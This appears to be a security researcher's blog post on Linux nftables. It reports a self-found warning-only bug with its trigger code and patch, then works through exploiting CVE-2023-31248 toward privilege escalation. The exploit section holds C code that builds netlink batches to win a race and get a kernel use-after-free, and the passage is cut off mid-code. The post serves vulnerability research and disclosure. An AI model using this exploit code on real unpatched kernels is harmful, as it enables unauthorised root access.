During my internship, I have been researching and trying to find bugs within the nftables subsystem. In this blog post, I will talk about a bug I have found, as well as the exploitation of an n-day discovered by Mingi Cho – CVE-2023-31248.
nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.
Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table
.
/**
* struct nft_table - nf_tables table
*
* @list: used internally
* @chains_ht: chains in the table
* @chains: same, for stable walks
* @sets: sets in the table
* @objects: stateful objects in the table
* @flowtables: flow tables in the table
* @hgenerator: handle generator state
* @handle: table handle
* @use: number of chain references to this table
* @flags: table flag (see enum nft_table_flags)
* @genmask: generation mask
* @afinfo: address family info
* @name: name of the table
* @validate_state: internal, set when transaction adds jumps
*/
struct nft_table {
struct list_head list;
struct rhltable chains_ht;
struct list_head chains;
struct list_head sets;
struct list_head objects;
struct list_head flowtables;
u64 hgenerator;
u64 handle;
u32 use;
u16 family:6,
flags:8,
genmask:2;
u32 nlpid;
char *name;
u16 udlen;
u8 *udata;
u8 validate_state;
};
A table can have multiple different flags. The user is able to set the flags NFT_TABLE_F_DORMANT
and/or NFT_TABLE_F_OWNER
when the table is created (nf_tables_newtable
). The dormant state flag (NFT_TABLE_F_DORMANT
) can be updated in nf_tables_updtable
. If NFT_TABLE_F_DORMANT
(0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE
flags, which comprise of __NFT_TABLE_F_WAS_AWAKEN
and __NFT_TABLE_F_WAS_DORMANT
.
Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain
.
/**
* struct nft_chain - nf_tables chain
*
* @rules: list of rules in the chain
* @list: used internally
* @rhlhead: used internally
* @table: table that this chain belongs to
* @handle: chain handle
* @use: number of jump references to this chain
* @flags: bitmask of enum nft_chain_flags
* @name: name of the chain
*/
struct nft_chain {
struct nft_rule_blob __rcu *blob_gen_0;
struct nft_rule_blob __rcu *blob_gen_1;
struct list_head rules;
struct list_head list;
struct rhlist_head rhlhead;
struct nft_table *table;
u64 handle;
u32 use;
u8 flags:5,
bound:1,
genmask:2;
char *name;
u16 udlen;
u8 *udata;
/* Only used during control plane commit phase: */
struct nft_rule_blob *blob_next;
};
Basechains are represented by struct nft_base_chain
.
/**
* struct nft_base_chain - nf_tables base chain
*
* @ops: netfilter hook ops
* @hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
* @type: chain type
* @policy: default policy
* @stats: per-cpu chain stats
* @chain: the chain
* @flow_block: flow block (for hardware offload)
*/
struct nft_base_chain {
struct nf_hook_ops ops;
struct list_head hook_list;
const struct nft_chain_type *type;
u8 policy;
u8 flags;
struct nft_stats __percpu *stats;
struct nft_chain chain;
struct flow_block flow_block;
};
Rules contain nftables expressions. Internally, rules are represented by struct nft_rule
.
/**
* struct nft_rule - nf_tables rule
*
* @list: used internally
* @handle: rule handle
* @genmask: generation mask
* @dlen: length of expression data
* @udata: user data is appended to the rule
* @data: expression data
*/
struct nft_rule {
struct list_head list;
u64 handle:42,
genmask:2,
dlen:12,
udata:1;
unsigned char data[]
__attribute__((aligned(__alignof__(struct nft_expr))));
};
Expressions act as the operations of the state machine. There are many expressions, here are some for example:
Interally, expressions are represented by struct nft_expr
.
/**
* struct nft_expr - nf_tables expression
*
* @ops: expression ops
* @data: expression private data
*/
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
Each expression also has a struct nft_expr_ops
representing various operations.
/**
* struct nft_expr_ops - nf_tables expression operations
*
* @eval: Expression evaluation function
* @size: full expression size, including private data size
* @init: initialization function
* @activate: activate expression in the next generation
* @deactivate: deactivate expression in next generation
* @destroy: destruction function, called after synchronize_rcu
* @dump: function to dump parameters
* @type: expression type
* @validate: validate expression, called during loop detection
* @data: extra data to attach to this expression operation
*/
struct nft_expr_ops {
void (*eval)(const struct nft_expr *expr,
struct nft_regs *regs,
const struct nft_pktinfo *pkt);
int (*clone)(struct nft_expr *dst,
const struct nft_expr *src);
unsigned int size;
int (*init)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[]);
void (*activate)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*deactivate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
enum nft_trans_phase phase);
void (*destroy)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*destroy_clone)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
int (*dump)(struct sk_buff *skb,
const struct nft_expr *expr,
bool reset);
int (*validate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nft_data **data);
bool (*reduce)(struct nft_regs_track *track,
const struct nft_expr *expr);
bool (*gc)(struct net *net,
const struct nft_expr *expr);
int (*offload)(struct nft_offload_ctx *ctx,
struct nft_flow_rule *flow,
const struct nft_expr *expr);
bool (*offload_action)(const struct nft_expr *expr);
void (*offload_stats)(struct nft_expr *expr,
const struct flow_stats *stats);
const struct nft_expr_type *type;
void *data;
};
Many nftables objects have a 2 bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining the bit that represents the current generation. Objects can have the following states:
In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which include functions such as nf_tables_newtable
, nf_tables_updtable
, nf_tables_newchain
and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.
When a netlink batch transaction is considered to be valid (i.e. all actions in the control plane do not return errors), the commit phase is entered and nf_tables_commit
is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work
).
The asynchronous transaction worker, when run, will call nft_commit_release
, which will finally call functions that will destroy and free objects marked for deletion.
While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1
When a newly created table table is updated via nf_tables_updtable
from active to dormant, the table flag is set to NFT_TABLE_F_DORMANT
, and as none of the __NFT_TABLE_F_UPDATE
flags are set, the __NFT_TABLE_F_WAS_AWAKEN
flag will be set. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit
is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT
flag is unset. It then checks if any of the __NFT_TABLE_F_UPDATE
flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable
(i.e. before nf_tables_commit
is called). This code behaviour can be seen below:
static int nf_tables_updtable(struct nft_ctx *ctx) {
...
if ((flags & NFT_TABLE_F_DORMANT) &&
!(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
ctx->table->flags |= NFT_TABLE_F_DORMANT;
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
} else if (!(flags & NFT_TABLE_F_DORMANT) &&
ctx->table->flags & NFT_TABLE_F_DORMANT) {
ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
ret = nf_tables_table_enable(ctx->net, ctx->table);
if (ret < 0)
goto err_register_hooks;
ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;
}
}
...
}
It is possible to activate/deactivate tables in a way such that at one point of time, some chains are registered and some are not registered. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN
flag, which is one of the __NFT_TABLE_F_UPDATE
flags are set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE
flags are set, nf_tables_table_enable
is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook
only checks if the NFT_TABLE_F_DORMANT
flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they are not registered in the first place. This causes the following warning to be displayed:
[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS: 00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044] <TASK>
[ 1411.172713] ? __warn+0x9c/0x200
[ 1411.174282] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416] ? report_bug+0x1f2/0x220
[ 1411.177947] ? handle_bug+0x3c/0x80
[ 1411.179123] ? exc_invalid_op+0x13/0x40
[ 1411.180361] ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887] ? preempt_count_sub+0xf/0xc0
[ 1411.183772] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045] nf_tables_commit+0x1a15/0x2600
[ 1411.189373] ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535] ? __pfx_lock_release+0x20/0x20
[ 1411.193486] ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470] nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345] ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436] ? find_held_lock+0x83/0xa0
[ 1411.200948] nfnetlink_rcv+0x1da/0x220
[ 1411.202570] ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341] ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507] netlink_unicast+0x2ca/0x460
[ 1411.208166] ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278] ? __virt_addr_valid+0xd4/0x160
[ 1411.212405] netlink_sendmsg+0x3d5/0x700
[ 1411.214076] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943] ? import_ubuf+0xc1/0x100
[ 1411.217517] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358] sock_sendmsg+0xda/0xe0
[ 1411.220915] ? import_iovec+0x54/0x80
[ 1411.222655] ____sys_sendmsg+0x436/0x500
[ 1411.224223] ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046] ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928] ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274] ? find_held_lock+0x83/0xa0
[ 1411.230507] ___sys_sendmsg+0xf8/0x160
[ 1411.231712] ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656] ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285] ? sock_has_perm+0xc9/0x1a0
[ 1411.236601] ? __fget_light+0xda/0x100
[ 1411.238418] __sys_sendmsg+0xe5/0x180
[ 1411.240445] ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861] ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273] ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890] do_syscall_64+0x3a/0xa0
[ 1411.246060] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0
To trigger the bug, the following steps should be taken (in the same batch transaction):
NFT_TABLE_F_DORMANT
and __NFT_TABLE_F_WAS_AWAKEN
table flags are setNFT_TABLE_F_DORMANT
flag is zeroed out, but the __NFT_TABLE_F_WAS_AWAKEN
flag is still set, causing nf_tables_enable_table
to be skippednft delete table test_table
[5]The table is active when it was deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
struct unft_base_chain_param {
uint32_t hook_num;
uint32_t prio;
};
struct nftnl_table* build_table(char* name, uint16_t family) {
struct nftnl_table* t = nftnl_table_alloc();
nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
return t;
}
struct nftnl_chain* build_chain(char* table_name, char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
struct nftnl_chain* c;
c = nftnl_chain_alloc();
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
if (base_param) {
nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
}
if (chain_id) {
nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
}
return c;
}
int main(void) {
char buf[MNL_SOCKET_BUFFER_SIZE];
struct nlmsghdr *nlh;
struct mnl_nlmsg_batch *batch;
int ret;
int seq = time(NULL);
uint8_t family = NFPROTO_IPV4;
struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
if (nl == NULL) {
perror("mnl_socket_open");
exit(EXIT_FAILURE);
}
if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
perror("mnl_socket_bind");
exit(EXIT_FAILURE);
}
// Start nl message
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create active table "test_table" [1]
struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
// Update table "test_table" -- table is now dormant [2]
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
// Add basechain "chain1" -- not registered [3]
struct unft_base_chain_param bp2;
bp2.hook_num = NF_INET_LOCAL_OUT;
bp2.prio = 11;
struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Update table "test_table" -- table is now active [4]
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
mnl_nlmsg_batch_stop(batch);
// Trigger warning [5]
system("nft delete table test_table");
return 0;
}
Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook
will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0
, resulting in another warning, preventing us from reaching the free.
To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
flags & NFT_TABLE_F_OWNER))
return -EOPNOTSUPP;
+ /* No dormant off/on/off/on games in single transaction */
+ if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+ return -EINVAL;
+
trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
sizeof(struct nft_trans_table));
if (trans == NULL)
If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable
will simply fail.
Other than trying to find new bugs, I also conducted n-day research on CVE-2023-31248, which was discovered by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89
Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. The exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.
nft_chain_lookup_byid
does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
const struct nlattr *nla)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
struct nft_trans *trans;
list_for_each_entry(trans, &nft_net->commit_list, list) {
struct nft_chain *chain = trans->ctx.chain;
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
id == nft_trans_chain_id(trans))
return chain;
}
return ERR_PTR(-ENOENT);
}
When adding a rule to a chain referring to its ID, if that chain had been deleted on the same batch, it is possible to refer to an inactive chain. Rule addition will fail immediately afterwards due to the value of chain->use not being 0, resulting in a warning being displayed.
To trigger the bug, a batch transaction can be sent comprising of the following steps:
NFT_MSG_NEWTABLE
)NFT_MSG_NEWCHAIN
)NFT_MSG_DELCHAIN
)NFT_MSG_NEWCHAIN
)NFT_MSG_NEWRULE
)When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.
nf_tables_newrule
-> nf_tables_newexpr
-> nft_immediate_init
-> nft_data_init
-> nft_verdict_init
As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch
calls the commit operation for nf_tables_subsys
, which is nf_tables_commit
.
Note that the struct nft_chain chain1
object is not immediately deleted when NFT_MSG_DELCHAIN
is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:
nf_tables_commit
-> nf_tables_commit_release
-> nf_tables_trans_destroy_work
-> nft_commit_release
-> nf_tables_chain_destroy
However, in this case, when nf_tables_chain_destroy
is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).
void nf_tables_chain_destroy(struct nft_ctx *ctx)
{
struct nft_chain *chain = ctx->chain;
struct nft_hook *hook, *next;
if (WARN_ON(chain->use > 0)) <-- [6]
return;
/* no concurrent access possible anymore */
nf_tables_chain_free_chain_rules(chain);
if (nft_is_base_chain(chain)) {
struct nft_base_chain *basechain = nft_base_chain(chain);
if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
list_for_each_entry_safe(hook, next,
&basechain->hook_list, list) {
list_del_rcu(&hook->list);
kfree_rcu(hook, rcu);
}
}
module_put(basechain->type->owner);
if (rcu_access_pointer(basechain->stats)) {
static_branch_dec(&nft_counters_enabled);
free_percpu(rcu_dereference_raw(basechain->stats));
}
kfree(chain->name);
kfree(chain->udata);
kfree(basechain);
} else {
kfree(chain->name);
kfree(chain->udata);
kfree(chain);
}
}
The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy
is called, the chain object is freed. This can be done via exploiting the race condition between the control plane (nf_tables_delrule
) and the transaction worker (nf_tables_trans_destroy_work
).
In order to do this, 2 batch transactions were sent. In the first batch transaction, the following actions were performed:
NFT_MSG_NEWTABLE
)NFT_MSG_NEWCHAIN
). The name of the chain is 20 characters long. This is the chain to be deleted.NFT_MSG_DELCHAIN
)NFT_MSG_NEWCHAIN
) // Start nl message 1
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create table
struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
nftnl_table_free(t);
mnl_nlmsg_batch_next(batch);
// Create chain 1
struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Delete chain 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
nftnl_chain_free(c);
mnl_nlmsg_batch_next(batch);
// Create chain 2
struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c2);
nftnl_chain_free(c2);
mnl_nlmsg_batch_next(batch);
// Create rule pointing to chain 1
struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
// Add immediate expr to rule
struct nftnl_expr *e = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
nftnl_rule_add_expr(r, e);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.
The second batch transaction consists of the following operations:
NFT_MSG_DELRULE
) // Start nl message 2
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Delete rule 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
// Fail the batch using a invalid rule
struct nftnl_rule *r2 = nftnl_rule_alloc();
nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");
struct xt_audit_info *audit_info;
audit_info = malloc(sizeof(struct xt_audit_info));
audit_info->type = 0xff; <-- [7]
struct nftnl_expr *e2 = nftnl_expr_alloc("target");
nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
nftnl_rule_add_expr(r2, e2);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r2);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message 2
printf("[+] Sending netlink message 2\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).
As NFT_MSG_DELRULE
was passed to nftables, the following code path is taken:
nf_tables_delrule
-> nft_delrule_by_chain
-> nft_delrule
-> nft_rule_expr_deactivate
-> nft_immediate_deactivate
-> nft_data_release
-> nft_verdict_uninit
Specifically, in nft_verdict_uninit
, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.
static void nft_verdict_uninit(const struct nft_data *data)
{
struct nft_chain *chain;
struct nft_rule *rule;
switch (data->verdict.code) {
case NFT_JUMP:
case NFT_GOTO:
chain = data->verdict.chain;
chain->use--;
...
Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work
runs, and the transaction worker must run before the failed batch transaction is aborted.
If the rule is marked for deletion before nf_tables_chain_destroy
is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the chain is freed in the order chain->name
, chain->udata
, and chain
. The struct nft_chain
object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space where chain, chain->name and chain->udata originally was can now be reclaimed with another object to aid us in our exploitation.
Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.
The struct nft_chain
object is allocated when nftables receives a NFT_MSG_NEWCHAIN
message. In the control plane, nf_tables_newchain
calls nf_tables_addchain
, which allocates the new chain object in the kmalloc-cg-128
cache. chain->udata and chain->name are allocated in their respective kmalloc-cg
caches by nla_memdup
and nla_strdup
respectively.
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy, u32 flags,
struct netlink_ext_ack *extack)
{
...
chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
if (chain == NULL)
return -ENOMEM;
...
if (nla[NFTA_CHAIN_NAME]) {
chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
} else {
if (!(flags & NFT_CHAIN_BINDING)) {
err = -EINVAL;
goto err_destroy_chain;
}
snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
}
...
if (nla[NFTA_CHAIN_USERDATA]) {
chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
if (chain->udata == NULL) {
err = -ENOMEM;
goto err_destroy_chain;
